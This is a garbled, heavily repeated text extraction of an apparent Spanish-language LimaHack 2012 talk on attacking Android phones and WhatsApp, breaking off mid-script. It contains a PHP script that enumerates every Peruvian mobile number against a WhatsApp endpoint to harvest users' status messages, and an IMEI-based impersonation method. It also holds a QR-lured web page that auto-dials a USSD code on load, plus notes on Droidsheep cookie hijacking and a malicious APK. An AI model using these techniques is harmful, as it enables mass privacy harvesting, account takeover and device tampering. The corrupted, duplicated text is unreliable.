bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
